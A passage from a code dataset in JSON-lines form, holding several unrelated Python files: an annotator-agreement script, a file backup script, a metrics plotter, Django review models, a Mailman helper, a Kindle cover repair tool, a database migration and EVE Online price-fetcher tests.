\"G\"),(\"A\", \"B\",\"R\", \"O\", \"G\"))\n for group in groups:\n print(\"Considering labels: \" + str(group))\n by_label = by_lang[\\\n (by_lang['mt_label_x'].isin(group)) & (by_lang['mt_label_y'].isin(group))]\n print(\"Confusion matrix\")\n cm = ConfusionMatrix(by_label['mt_label_x'], by_label['mt_label_y'], \\\n true_name=\"annot_1\", pred_name=\"annot_2\")\n print(cm)\n df = cm.to_dataframe()\n print(\"Normalised confusion matrix\")\n print (df / df.sum().sum())\n kappa, p_o, p_e = get_kappa(cm)\n #print(cm.to_dataframe())\n #print(cm.stats())\n print(\"Kappa: %7.5f; P_o: %7.5f; P_e: %7.5f\" % (kappa, p_o, p_e))\n if args.create_heatmaps and group == (\"A\", \"B\",\"R\", \"O\", \"G\"):\n import matplotlib.pyplot as plt\n import seaborn\n seaborn.set(font_scale=2.2)\n 
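# figure.autolayout makes matplotlib apply tight_layout on draw, so the enlarged tick labels fit in the saved PNG\n 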
plt.rcParams.update({'figure.autolayout': True})\n heatmap = seaborn.heatmap(df)\n heatmap.set_xlabel(\"Annotator 1\")\n heatmap.set_ylabel(\"Annotator 2\")\n plt.savefig(\"iaa_heatmap_{}.png\".format(lang))\n plt.clf()\n\ndef print_iaa_sentence_detail(agree, detail_file):\n#TODO sentence id, matches per sentence, pc a/b, pc r/o/g. src, tgt, ucca stats\n #sentences = agree[['sent_id', 'lang', 'annot_id_x', 'annot_id_y', 'ucca_label_x', 'mt_label_x', 'mt_label_y']]\n #sentences = sentences.groupby(['sent_id', 'lang'], as_index = False) \n agree['match'] = agree['mt_label_x'] == agree['mt_label_y']\n group = ('A','B')\n agree['ab'] = agree['mt_label_x'].isin(group) & agree['mt_label_y'].isin(group)\n agree['abmatch'] = agree['ab'] & agree['match']\n\n grouped = agree.groupby(['sent_id', 'lang'], as_index=True)\n sentences = pandas.DataFrame({'accuracy' : grouped['match'].sum() / grouped['match'].size()})\n sentences['ab_accuracy'] = grouped['abmatch'].sum() / grouped['ab'].sum()\n\n\n sentences.to_csv(detail_file)\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-n\", \"--node-file\", default=NODES, \\\n help=\"CSV file containing the node data\")\n parser.add_argument(\"--exclude-missing\", default=True, action=\"store_true\",\n help=\"Excluding nodes that either annotator has missed\")\n parser.add_argument(\"--create-heatmaps\", default=False, action=\"store_true\")\n parser.add_argument(\"--separate-label-groups\", default=True, action=\"store_true\",\n help=\"Treat A,B and R,G,O separately\")\n parser.add_argument(\"--iaa-sentence-detail\", help=\"Write detailed IAA for each sentence to the given file\")\n \n\n args = parser.parse_args()\n\n allnodes = pandas.read_csv(args.node_file, converters={'node_id': str, 'parent' : str})\n\n # Generate records of multiply-annotated nodes\n # Join to find nodes annotated by each annotator\n merged = allnodes.merge(allnodes, on = [\"node_id\", \"sent_id\", \"lang\"])\n # Only want records where annotators do not much. Use an ordering\n # so we just get (pl1, pl2) and not (pl2, pl1)\n agree = merged[(merged[\"annot_id_x\"] < merged[\"annot_id_y\"])]\n # Optionally exclude missing annotations. Many of these are when one annotator has missed\n # the node, or the sentences. 
However some are legitimate, when a leaf node is not required\n # in the target language (such as an article)\n if args.exclude_missing: agree = agree[(agree[\"mt_label_x\"] != \"M\") & (agree[\"mt_label_y\"] != \"M\")]\n\n if args.iaa_sentence_detail:\n print_iaa_sentence_detail(agree, args.iaa_sentence_detail)\n\n for lang, code in LANGCODES:\n by_lang = agree[agree['lang'] == code]\n print (\"************{}*************\".format(lang))\n print_overall_stats(by_lang,args)\n print_overall_iaa(by_lang, code, args)\n print ()\n\n\n\n# alldata = pandas.read_csv(\"data.csv\", converters={'id': str, 'parent' : str})\n# merged = alldata.merge(alldata, on = [\"id\", \"sent\", \"lang\"])\n# agree = merged[(merged[\"user_x\"] < merged[\"user_y\"])]\n#\n# for lang, code in (\"Romanian\",\"ro\"), (\"Polish\", \"pl\"):\n# print (\"CONFUSION MATRIX: \" + lang)\n# by_lang = agree[agree['lang'] == code]\n# \n# #Confusion Matrix\n# #print(\"With Missing\")\n# cm = ConfusionMatrix(by_lang['mteval_x'], by_lang['mteval_y'])\n# print(cm)\n# print(\"Kappa: %7.5f\" % cm.stats()['overall']['Kappa'])\n#\n# #print(\"Without Missing\")\n# #by_lang = by_lang[(by_lang['mteval_x'] != \"M\") & (by_lang['mteval_y'] != \"M\")]\n# #cm = ConfusionMatrix(by_lang['mteval_x'], by_lang['mteval_y'])\n# #print (cm)\n# #print(\"Kappa: %7.5f\" % cm.stats()['overall']['Kappa'])\n#\n# #Break down errors by uccalabel\n# by_lang['match'] = (by_lang['mteval_x'] == by_lang['mteval_y'])\n# by_uccalabel = by_lang.groupby([\"uccalabel_x\", \"match\"])['id'].count().unstack(1).fillna(0)\n# by_uccalabel['pc_correct'] = by_uccalabel[True] / (by_uccalabel[True] + by_uccalabel[False])\n# print(\"Breakdown by uccalabel\")\n# print(by_uccalabel)\n#\n# for label in \"A\", \"C\", \"D\", \"E\", \"F\", \"G\", \"H\", \"L\", \"N\", \"None\", \"P\", \"R\", \"S\", \"Ti\":\n# by_uccalabel = by_lang[by_lang['uccalabel_x'] == label]\n# cm = ConfusionMatrix(by_uccalabel['mteval_x'], by_uccalabel['mteval_y'])\n# if cm.len() > 1:\n# try:\n# kappa = \"%7.5f\" % cm.stats()['overall']['Kappa']\n# except:\n# kappa = \"Failed\"\n# print(\"UCCA label: %3s Kappa: %s\" % (label,kappa))\n# # Comment out this to get all CMs\n# if code == \"pl\" and label == \"H\":\n# print(cm)\n#\n#\n# print(\"\")\n#\n \n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"bhaddow/hume-data","sub_path":"round_1/scripts/iaa.py","file_name":"iaa.py","file_ext":"py","file_size_in_byte":6634,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"71672681710","text":"import os\r\nimport shutil\r\nsource=input(\"Enter the source name of the Folder: \")\r\ndestination=input(\"Enter the destination name of the Folder: \")\r\n\r\nsource=source + '/'\r\ndestination=destination + '/'\r\n\r\nlistOfFiles=os.listdir(source)\r\nfor file in listOfFiles:\r\n shutil.copy((source+file),destination)\r\n\r\n","repo_name":"Diwakar8-3-8/ProjectC99","sub_path":"backupFiles.py","file_name":"backupFiles.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"26885380747","text":"import json\nimport matplotlib.pyplot as plt\nimport os\nimport numpy as np\nimport japanize_matplotlib \n\n\n\ndef load_json_arr(json_path):\n lines = []\n with open(json_path, 'r') as f:\n for line in f:\n lines.append(json.loads(line))\n return lines\n\n\ndef plot_metrics(working_directory, saved_model_path, label_json, max_iterations, model_type):\n number_of_columns = 
len(label_json) + 1\n print(\"number_of_columns\", number_of_columns, \"max_iterations\", max_iterations, \"model_type\", model_type)\n experiment_metrics = load_json_arr(os.path.join(working_directory, \"output\", \"metrics.json\"))\n \n x_axis = np.arange(0, max_iterations + 1, max_iterations/5)\n x_axis = x_axis.astype(int)\n\n key_metric = ''\n if (model_type == 'detr' or model_type == 'faster_rcnn' or model_type == 'trident'):\n key_metric = 'bbox/AP'\n elif (model_type == 'mask_rcnn' or model_type == 'pointrend'):\n key_metric = 'segm/AP'\n\n if (key_metric == ''):\n print('model_type', model_type, ' is not supported')\n return\n\n plt.figure(figsize=(10, 7)) \n column_no = 1\n plt.subplot(1,number_of_columns, column_no)\n plt.xticks(x_axis)\n ax = plt.gca()\n ax.set_ylim([0, 100])\n plt.plot(\n [x['iteration'] for x in experiment_metrics if key_metric in x.keys()], \n [x[key_metric] for x in experiment_metrics if key_metric in x.keys()])\n if (number_of_columns > 2):\n plt.title(key_metric + ' Overall') \n else:\n plt.title(key_metric + ' ' + label_json[0]['name']) \n plt.xlabel('iteration')\n\n if (number_of_columns > 2):\n for label in label_json:\n column_no = column_no + 1\n label_id = label['id']\n plt.subplot(1, number_of_columns, column_no)\n plt.xticks(x_axis)\n ax = plt.gca()\n ax.set_ylim([0, 100])\n plt.plot(\n [x['iteration'] for x in experiment_metrics if key_metric in x.keys()], \n [x[key_metric + '-' + str(label_id)] for x in experiment_metrics if key_metric in x.keys()])\n plt.title(key_metric + ' ' + label['name'])\n plt.xlabel('iteration')\n plt.savefig(os.path.join(saved_model_path, 'report.png'))\n\nif __name__ == '__main__':\n working_directory = \"/workspace-test-v1/mlapp/working_directory\"\n saved_model_path = \"/workspace-test-v1/saved-model\"\n max_iteration = 600\n model_type = 'mask_rcnn'\n with open(os.path.join(working_directory, \"labels.json\")) as f:\n labelJson = json.load(f)\n print(\"labelJson\", labelJson)\n plot_metrics(working_directory, saved_model_path, labelJson, max_iteration, model_type)","repo_name":"oita-apc/Chimera-AI-Evangelist","sub_path":"gatewayapp/plotmetrics.py","file_name":"plotmetrics.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34093168429","text":"from django.conf import settings\nfrom django.core.exceptions import ValidationError\nfrom django.db import models\nfrom django.db.models import Sum, Count\nfrom django.utils.translation import ugettext as _\n\nfrom oscar.apps.catalogue.reviews.managers import ApprovedReviewsManager\n\n\nclass AbstractProductReview(models.Model):\n \"\"\"\n Superclass ProductReview.\n\n Some key aspects have been implemented from the original spec.\n * Each product can have reviews attached to it. 
Each review has a title, a\n body and a score from 0-5.\n * Signed in users can always submit reviews, anonymous users can only\n submit reviews if a setting OSCAR_ALLOW_ANON_REVIEWS is set to true - it\n should default to false.\n * If anon users can submit reviews, then we require their name, email\n address and an (optional) URL.\n * By default, reviews must be approved before they are live.\n However, if a setting OSCAR_MODERATE_REVIEWS is set to false,\n then they don't need moderation.\n * Each review should have a permalink, ie it has its own page.\n * Each reviews can be voted up or down by other users\n * Only signed in users can vote\n * A user can only vote once on each product once\n \"\"\"\n\n # Note we keep the review even if the product is deleted\n product = models.ForeignKey(\n 'catalogue.Product', related_name='reviews', null=True,\n on_delete=models.SET_NULL)\n\n # Scores are between 0 and 5\n SCORE_CHOICES = tuple([(x, x) for x in range(0, 6)])\n score = models.SmallIntegerField(_(\"Score\"), choices=SCORE_CHOICES)\n\n title = models.CharField(max_length=255, verbose_name=_(\"Review title\"))\n body = models.TextField(_(\"Body\"))\n\n # User information. We include fields to handle anonymous users\n user = models.ForeignKey(\n 'auth.User', related_name='reviews', null=True, blank=True)\n name = models.CharField(_(\"Name\"), max_length=255, null=True, blank=True)\n email = models.EmailField(_(\"Email\"), null=True, blank=True)\n homepage = models.URLField(_(\"URL\"), null=True, blank=True)\n\n FOR_MODERATION, APPROVED, REJECTED = range(0, 3)\n STATUS_CHOICES = (\n (FOR_MODERATION, _(\"Requires moderation\")),\n (APPROVED, _(\"Approved\")),\n (REJECTED, _(\"Rejected\")),\n )\n default_status = FOR_MODERATION if settings.OSCAR_MODERATE_REVIEWS else APPROVED\n status = models.SmallIntegerField(\n _(\"Status\"), choices=STATUS_CHOICES, default=default_status)\n\n # Denormalised vote totals\n total_votes = models.IntegerField(\n _(\"Total Votes\"), default=0) # upvotes + down votes\n delta_votes = models.IntegerField(\n _(\"Delta Votes\"), default=0, db_index=True) # upvotes - down votes\n\n date_created = models.DateTimeField(auto_now_add=True)\n\n # Managers\n objects = models.Manager()\n approved = ApprovedReviewsManager()\n\n class Meta:\n abstract = True\n ordering = ['-delta_votes']\n unique_together = (('product', 'user'),)\n verbose_name = _('Product Review')\n verbose_name_plural = _('Product Reviews')\n\n @models.permalink\n def get_absolute_url(self):\n return ('catalogue:reviews-detail', (), {\n 'product_slug': self.product.slug,\n 'product_pk': self.product.id,\n 'pk': self.id})\n\n def __unicode__(self):\n return self.title\n\n def save(self, *args, **kwargs):\n if not self.user and not (self.name and self.email):\n raise ValidationError(_(\"Anonymous review must have a name and an email\"))\n if not self.title:\n raise ValidationError(_(\"Reviews must have a title\"))\n if self.score is None:\n raise ValidationError(_(\"Reviews must have a score\"))\n super(AbstractProductReview, self).save(*args, **kwargs)\n self.product.update_rating()\n\n def delete(self, *args, **kwargs):\n super(AbstractProductReview, self).delete(*args, **kwargs)\n self.product.update_rating()\n\n def has_votes(self):\n return self.total_votes > 0\n\n def num_up_votes(self):\n \"\"\"Returns the total up votes\"\"\"\n return int((self.total_votes + self.delta_votes) / 2)\n\n def num_down_votes(self):\n \"\"\"Returns the total down votes\"\"\"\n return int((self.total_votes - 
self.delta_votes) / 2)\n\n def update_totals(self):\n \"\"\"\n Update total and delta votes\n \"\"\"\n result = self.votes.aggregate(\n score=Sum('delta'), total_votes=Count('id'))\n self.total_votes = result['total_votes'] or 0\n self.delta_votes = result['score'] or 0\n self.save()\n\n def get_reviewer_name(self):\n if self.user:\n name = self.user.get_full_name()\n return name if name else _('anonymous')\n else:\n return self.name\n\n\nclass AbstractVote(models.Model):\n \"\"\"\n Records user ratings as yes/no vote.\n * Only signed-in users can vote.\n * Each user can vote only once.\n \"\"\"\n review = models.ForeignKey('reviews.ProductReview', related_name='votes')\n user = models.ForeignKey('auth.User', related_name='review_votes')\n UP, DOWN = 1, -1\n VOTE_CHOICES = (\n (UP, _(\"Up\")),\n (DOWN, _(\"Down\"))\n )\n delta = models.SmallIntegerField(_('Delta'), choices=VOTE_CHOICES)\n date_created = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n abstract = True\n ordering = ['-date_created']\n unique_together = (('user', 'review'),)\n verbose_name = _('Vote')\n verbose_name_plural = _('Votes')\n\n def __unicode__(self):\n return u\"%s vote for %s\" % (self.delta, self.review)\n\n def save(self, *args, **kwargs):\n super(AbstractVote, self).save(*args, **kwargs)\n self.review.update_totals()\n","repo_name":"riklaunim/django-oscar-custom-multisite","sub_path":"oscar/apps/catalogue/reviews/abstract_models.py","file_name":"abstract_models.py","file_ext":"py","file_size_in_byte":5786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"19686846595","text":"#!/usr/bin/python3\ndef safe_print_division(a, b):\n \"\"\"Function divides two integers and prints the result.\"\"\"\n try:\n x = int(a) / int(b)\n except Exception:\n x = None\n finally:\n if x is not None:\n print(\"Inside result: {}\".format(x))\n return x\n else:\n return None\n","repo_name":"aloicerains/alx-higher_level_programming","sub_path":"0x05-python-exceptions/3-safe_print_division.py","file_name":"3-safe_print_division.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"31691783906","text":"from Mailman import mm_cfg\nfrom Mailman import Utils\nfrom Mailman import MailList\n\ndef get_list_attributes_for_overview(script_url_part):\n # Skip any mailing lists that isn't advertised.\n hostname = Utils.get_domain()\n advertised = []\n listnames = Utils.list_names()\n listnames.sort()\n\n for name in listnames:\n mlist = MailList.MailList(name, lock=0)\n if mlist.advertised or mm_cfg.OverviewListUnadvertizedMailingLists:\n if mm_cfg.VIRTUAL_HOST_OVERVIEW and (\n mlist.web_page_url.find('/%s/' % hostname) == -1 and\n mlist.web_page_url.find('/%s:' % hostname) == -1):\n # List is for different identity of this host - skip it.\n continue\n else:\n if mm_cfg.LISTINFO_USE_CATEGORIES:\n data = mlist\n else:\n data = (mlist.GetScriptURL(script_url_part),\n mlist.real_name,\n mlist.description)\n advertised.append(data)\n return advertised\n","repo_name":"darix/mailman","sub_path":"Mailman/CgiUtils.py","file_name":"CgiUtils.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"15994805393","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport re\nimport sys\nimport glob\nimport imghdr\nimport string\nimport tempfile\nfrom pathlib import 
Path\n\nfrom File import MOBIFile\n\n\nclass FixCover:\n version = '1.1'\n description = 'A tool to fix damaged Kindle ebook covers.\\n\\\nDetail: https://bookfere.com/post/986.html'\n\n\n def __init__(self, logger=None, progress=None):\n self.logger = logger\n self.progress = progress\n\n self.print_log('Version: %s' % self.version)\n self.print_log(self.description, True)\n\n\n def print_log(self, text, sep=False):\n if self.logger is not None:\n divider = '-------------------------------------------'\n text = '%s\\n%s\\n%s' % (divider, text, divider) \\\n if sep is True else text\n self.logger(text)\n\n\n def print_progress(self, factor):\n if self.progress is not None:\n self.progress(factor)\n\n\n def get_filepath_list(self, path):\n return glob.glob('%s%s**' % (path, os.sep), recursive=True)\n\n\n def get_ebook_thumbnails(self, path):\n thumbnails = dict()\n for thumbnail in self.get_filepath_list(path):\n asin = re.match(rf'.*{re.escape(os.sep)}thumbnail_(.+)_EBOK.+',\n thumbnail)\n if asin is not None:\n thumbnails[asin.group(1)] = thumbnail\n return thumbnails\n\n\n def get_damaged_thumbnails(self, path):\n thumbnails = self.get_ebook_thumbnails(path)\n for thumbnail in thumbnails.copy():\n thumbnail_path = thumbnails[thumbnail]\n if os.path.getsize(thumbnail_path) < 2000:\n self.print_log('- %s' % Path(thumbnail_path).name)\n else:\n del thumbnails[thumbnail]\n return thumbnails\n\n\n def is_valid_ebook_file(self, filename):\n for ext in ['.mobi', '.azw', '.azw3', 'azw4']:\n if filename.endswith(ext):\n return True\n return False\n\n\n def get_ebook_list(self, path):\n ebook_list = []\n for filename in self.get_filepath_list(path):\n if not self.is_valid_ebook_file(filename):\n continue\n ebook_list.append(filename)\n return ebook_list\n\n\n def store_ebook_cover(self, path, data):\n with open(path, 'wb') as file:\n file.write(data)\n\n\n def get_ebook_metadata(self, path):\n ebook_asin = None\n ebook_type = None\n ebook_cover = None\n\n try:\n mobi_file = MOBIFile(path)\n ebook_asin = mobi_file.get_metadata('ASIN')\n ebook_type = mobi_file.get_metadata('Document Type')\n ebook_cover = mobi_file.get_cover_image()\n except:\n pass\n\n return (ebook_asin, ebook_type, ebook_cover)\n\n\n def get_thumbnail_name(self, asin):\n return 'thumbnail_%s_EBOK_portrait.jpg' % asin\n\n\n def fix_ebook_thumbnails(self, documents_path, thumbnails_path):\n failure_jobs = {\n 'cover_errors': [],\n 'ebook_errors': [],\n }\n\n self.print_log('Checking damaged ebook covers:', True)\n thumbnails = self.get_damaged_thumbnails(thumbnails_path)\n\n if len(thumbnails) < 1:\n self.print_log('No damaged ebook cover detected.')\n return\n\n self.print_log('Fixing damaged ebook covers:', True)\n self.print_log('Working...')\n\n ebook_list = self.get_ebook_list(documents_path)\n for ebook in ebook_list:\n self.print_progress(len(ebook_list))\n\n ebook_asin, ebook_type, ebook_cover = self.get_ebook_metadata(ebook)\n\n ebook = Path(ebook)\n\n if ebook_type == 'EBOK' and ebook_asin in thumbnails.keys():\n thumbnail_path = thumbnails[ebook_asin]\n thumbnail_name = Path(thumbnail_path).name\n if ebook_cover is not None:\n self.store_ebook_cover(thumbnail_path, ebook_cover)\n self.print_log('✓ Fixed: %s\\n └─[%s] %s' % (thumbnail_name,\n ebook_type, ebook.name))\n else:\n failure_jobs['ebook_errors'].append('%s\\n └─[%s] %s' %\n (ebook_type, thumbnail_name, ebook.name))\n del thumbnails[ebook_asin]\n elif ebook_type == 'EBOK' and ebook_cover is not None:\n thumbnail_name = self.get_thumbnail_name(ebook_asin)\n 
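# build the expected path under system/thumbnails; a fresh cover file is generated below if none exists yet\n 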
thumbnail_path = os.path.join(thumbnails_path, thumbnail_name)\n if not os.path.exists(thumbnail_path):\n self.store_ebook_cover(thumbnail_path, ebook_cover)\n self.print_log('✓ Generated: %s\\n └─[%s] %s' %\n (thumbnail_name, ebook_type, ebook.name))\n # [BUG] Do this will make Kindle can not open ebook.\n # elif ebook_type == 'PDOC' and ebook.suffix == '.azw3' and \\\n # ebook_cover is not None:\n # target = ebook.with_suffix('.mobi')\n # ebook.rename(target)\n # self.print_log(\n # '✓ Rename %s -> %s to show cover.\\n └─[%s] %s' %\n # (ebook.suffix, target.suffix, ebook_type, target.name)\n # )\n\n\n failure_jobs['cover_errors'] = [Path(thumbnail).name for\n thumbnail in thumbnails.values()]\n\n self.print_progress(0)\n\n if failure_jobs is None:\n self.print_log('- No ebook cover to fix.')\n return\n\n if any(len(job) > 0 for job in failure_jobs.values()):\n if len(failure_jobs['cover_errors']) > 0:\n self.print_log(\n '- These damaged covers have no corresponding ebook.'\n )\n for job in failure_jobs['cover_errors']:\n self.print_log('* %s' % job)\n\n\n if len(failure_jobs['ebook_errors']) > 0:\n self.print_log(\n '- The ebooks corresponding to these damaged covers have no'\n + ' covers, you can clean them.'\n )\n for job in failure_jobs['ebook_errors']:\n self.print_log('! %s' % job)\n else:\n self.print_log('✓ All ebook covers were fixed.')\n\n\n def clean_orphan_thumbnails(self, documents_path, thumbnails_path):\n self.print_log('Analysing orphan ebook covers:', True)\n thumbnails = self.get_ebook_thumbnails(thumbnails_path)\n ebook_list = self.get_ebook_list(documents_path)\n for ebook in ebook_list:\n self.print_progress(len(ebook_list))\n ebook_asin, ebook_type, ebook_cover = self.get_ebook_metadata(ebook)\n if ebook_type == 'EBOK' and ebook_asin in thumbnails.keys():\n del thumbnails[ebook_asin]\n\n self.print_progress(0)\n\n if len(thumbnails) < 1:\n self.print_log('- No orphan covers detected.')\n return\n\n for thumbnail in thumbnails.values():\n thumbnail_path = Path(thumbnail)\n thumbnail_path.unlink(True)\n self.print_log('✓ Delete: %s' % thumbnail_path.name)\n\n self.print_log('✓ All orphan ebook covers deleted.')\n\n\n def get_kindle_path(self, path):\n return (\n os.path.join(path, 'documents'),\n os.path.join(path, 'system', 'thumbnails')\n )\n\n\n def is_kindle_root(self, path):\n for path in self.get_kindle_path(path):\n if os.path.exists(path) is False:\n return False\n return True\n\n\n def get_kindle_root_manually(self, args):\n roots = []\n for path in args:\n path = os.path.join(path)\n if self.is_kindle_root(path):\n roots.append(path)\n else:\n message = '%s is not a kindle root directory.' 
% path if \\\n path != '' else 'You need choose a Kindle root directory first.'\n self.print_log(message)\n return roots\n\n\n def get_kindle_root_automatically(self):\n drives = []\n roots = []\n\n if sys.platform.startswith('win'):\n drives = ['%s:\\\\' % s.upper() for s in string.ascii_lowercase[:26]]\n drives.reverse()\n elif sys.platform.startswith('darwin'):\n drives = glob.glob('/Volumes/*')\n\n for drive in drives:\n path = os.path.join('%s' % drive)\n if self.is_kindle_root(path):\n roots.append(path)\n\n return roots\n\n\n def get_kindle_root(self, roots):\n if len(roots) > 0:\n return self.get_kindle_root_manually(roots)\n return self.get_kindle_root_automatically()\n\n\n # fix|clean\n def handle(self, action='fix', path=[]):\n if not sys.version_info >= (3, 5):\n self.print_log(\n 'Rquired Python version >= 3.5\\n' +\n 'You can download here: https://www.python.org/downloads/'\n )\n return\n\n path = [path] if type(path) != list else path\n kindle_roots = self.get_kindle_root(path)\n\n for kindle_root in kindle_roots:\n self.print_log('Processing Kindle device: %s' % kindle_root)\n\n documents_path, thumbnails_path = self.get_kindle_path(kindle_root)\n\n if action == 'fix':\n self.fix_ebook_thumbnails(documents_path, thumbnails_path)\n elif action == 'clean':\n self.clean_orphan_thumbnails(documents_path, thumbnails_path)\n else:\n self.print_log('Wrong action.')\n return\n\n self.print_log('All jobs done.', True)\n","repo_name":"muyutingfeng/Fix-Kindle-Ebook-Cover","sub_path":"FixCover.py","file_name":"FixCover.py","file_ext":"py","file_size_in_byte":9686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"38"} +{"seq_id":"14905425488","text":"\"\"\"extend app name length\n\nRevision ID: dfef3701086d\nRevises: 28610f9f9afc\nCreate Date: 2017-06-24 19:20:13.713135\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'dfef3701086d'\ndown_revision = '28610f9f9afc'\nbranch_labels = None\ndepends_on = None\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\ndef upgrade():\n op.alter_column('trade_keep_alive', 'app_name',\n existing_type=mysql.VARCHAR(length=20),\n type_=sa.String(length=255),\n existing_nullable=True)\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! 
###\n op.alter_column('trade_keep_alive', 'app_name',\n existing_type=sa.String(length=255),\n type_=mysql.VARCHAR(length=20),\n existing_nullable=True)\n ### end Alembic commands ###\n","repo_name":"zhangyiant/gtja_trade","sub_path":"alembic/versions/dfef3701086d_extend_app_name_length.py","file_name":"dfef3701086d_extend_app_name_length.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"} +{"seq_id":"71628444270","text":"import pandas as pd\nimport numpy as np\n\ndata = pd.read_csv('tmp_pglog_all.csv',sep='\\t',header=0)\ndata.columns = ['tip','pid','time','cpu','memory']\n\ndata['time'] = data['time']-data['time'].min()\ndata['time'] = data['time'] / 60\ndata['time'] = data['time'].astype(int)\ndata = data.groupby(['time','pid'])[['cpu','memory']].max().reset_index()\ndata.to_csv('report_pglog_all.csv',sep='\\t',header=True)\n\ndata = data.groupby('time')[['cpu','memory']].sum().reset_index()\nprint(f'CPU max: {data[\"cpu\"].max()}',flush=True) \nprint(f'MEM max: {data[\"memory\"].max()}',flush=True) \ndata.to_csv('report_pglog_all_as_one.csv',sep='\\t',header=True)\n","repo_name":"BGI-Qingdao/ProcessGroupMonitor","sub_path":"merge_all_thread.py","file_name":"merge_all_thread.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"38"} +{"seq_id":"71533741230","text":"#Clay Kynor\n#11/15/17\n#displayDate.py\n\nimport datetime\n\nmonths = ['January', 'February', \"March\", 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December']\nweekday = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']\ntoday = datetime.date.today()\nday = today.day\nmonth = today.month\nyear = today.year\n\nprint(month, day, year)\n","repo_name":"Clay190/Unit-5","sub_path":"displayDate.py","file_name":"displayDate.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"175101069","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\n\nfrom django.test import TestCase\n\nimport mock\nfrom model_mommy import mommy\n\nfrom eve.models import SolarSystem\nfrom eve.models import Station\nfrom eve.utils import PriceFetcher\nfrom eve.utils import get_station_or_system\n\n\nclass TestEveUtils(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n cls.item_1 = mommy.make('Item')\n cls.item_2 = mommy.make('Item')\n cls.region = mommy.make('Region')\n cls.station = mommy.make('Station')\n cls.solar_system = mommy.make('SolarSystem')\n\n cls.type_ids = [cls.item_1.type_id, cls.item_2.type_id]\n cls.region_id = cls.region.region_id\n\n cls.test_price_data = {\n 'sell': {\n 'min': 10.74,\n 'max': 17.4,\n 'median': 12.23,\n 'volume': 6780164119,\n 'percentile': 10.88,\n 'stddev': 1.67,\n 'avg': 13.15\n },\n 'all': {\n 'min': 1.01,\n 'max': 17.4,\n 'median': 11.32,\n 'volume': 9534000331,\n 'percentile': 6.93,\n 'stddev': 2.22,\n 'avg': 12.19\n },\n 'buy': {\n 'min': 5.0,\n 'max': 10.69,\n 'median': 10.55,\n 'volume': 2742836212,\n 'percentile': 10.68,\n 'stddev': 1.31,\n 'avg': 9.88\n },\n 'id': cls.item_1.type_id\n }\n\n cls.market_stats_raw_return_data = {\n cls.item_1.type_id: {\n 'sell': {\n 'min': 10.74,\n 'max': 17.4,\n 'median': 12.23,\n 'volume': 6780164119,\n 'percentile': 10.88,\n 'stddev': 1.67,\n 'avg': 13.15\n },\n 'all': {\n 'min': 1.01,\n 'max': 17.4,\n 'median': 11.32,\n
'volume': 9534000331,\n 'percentile': 6.93,\n 'stddev': 2.22,\n 'avg': 12.19\n },\n 'buy': {\n 'min': 5.0,\n 'max': 10.69,\n 'median': 10.55,\n 'volume': 2742836212,\n 'percentile': 10.68,\n 'stddev': 1.31,\n 'avg': 9.88\n },\n 'id': cls.item_1.type_id\n }\n }\n\n def test_get_station_or_system(self):\n station_id = self.station.station_id\n\n location_name, location_obj = get_station_or_system(station_id)\n self.assertEqual(location_name, 'station')\n\n solar_system_id = self.solar_system.solar_system_id\n\n location_name, location_obj = get_station_or_system(solar_system_id)\n self.assertEqual(location_name, 'solar_system')\n\n @mock.patch('evelink.thirdparty.eve_central.EVECentral.market_stats')\n def test_eve_central_manager_returns_price_data_dict_using_system(self, mock_market_stats):\n mock_market_stats.return_value = self.market_stats_raw_return_data\n\n type_ids = [self.item_1.type_id]\n system = self.solar_system.solar_system_id\n\n manager = PriceFetcher(type_ids, system=system)\n price_data = manager.fetch().next()\n\n self.assertEqual(price_data, self.test_price_data)\n\n @mock.patch('evelink.thirdparty.eve_central.EVECentral.market_stats')\n def test_eve_central_manager_returns_price_data_dict_using_hours(self, mock_market_stats):\n mock_market_stats.return_value = self.market_stats_raw_return_data\n\n type_ids = [self.item_1.type_id]\n system = self.solar_system.solar_system_id\n hours = 5\n\n manager = PriceFetcher(type_ids, hours=hours, system=system)\n price_data = manager.fetch().next()\n\n self.assertEqual(price_data, self.test_price_data)\n\n @mock.patch('evelink.thirdparty.eve_central.EVECentral.market_stats')\n def test_eve_central_manager_returns_price_data_dict_using_regions(self, mock_market_stats):\n mock_market_stats.return_value = self.market_stats_raw_return_data\n\n type_ids = [self.item_1.type_id]\n regions = self.region.region_id\n\n manager = PriceFetcher(type_ids, regions=regions)\n price_data = manager.fetch().next()\n\n self.assertEqual(price_data, self.test_price_data)\n\n def test_eve_central_manager_raises_exception(self):\n type_ids = [self.item_1.type_id]\n\n with self.assertRaises(AttributeError):\n 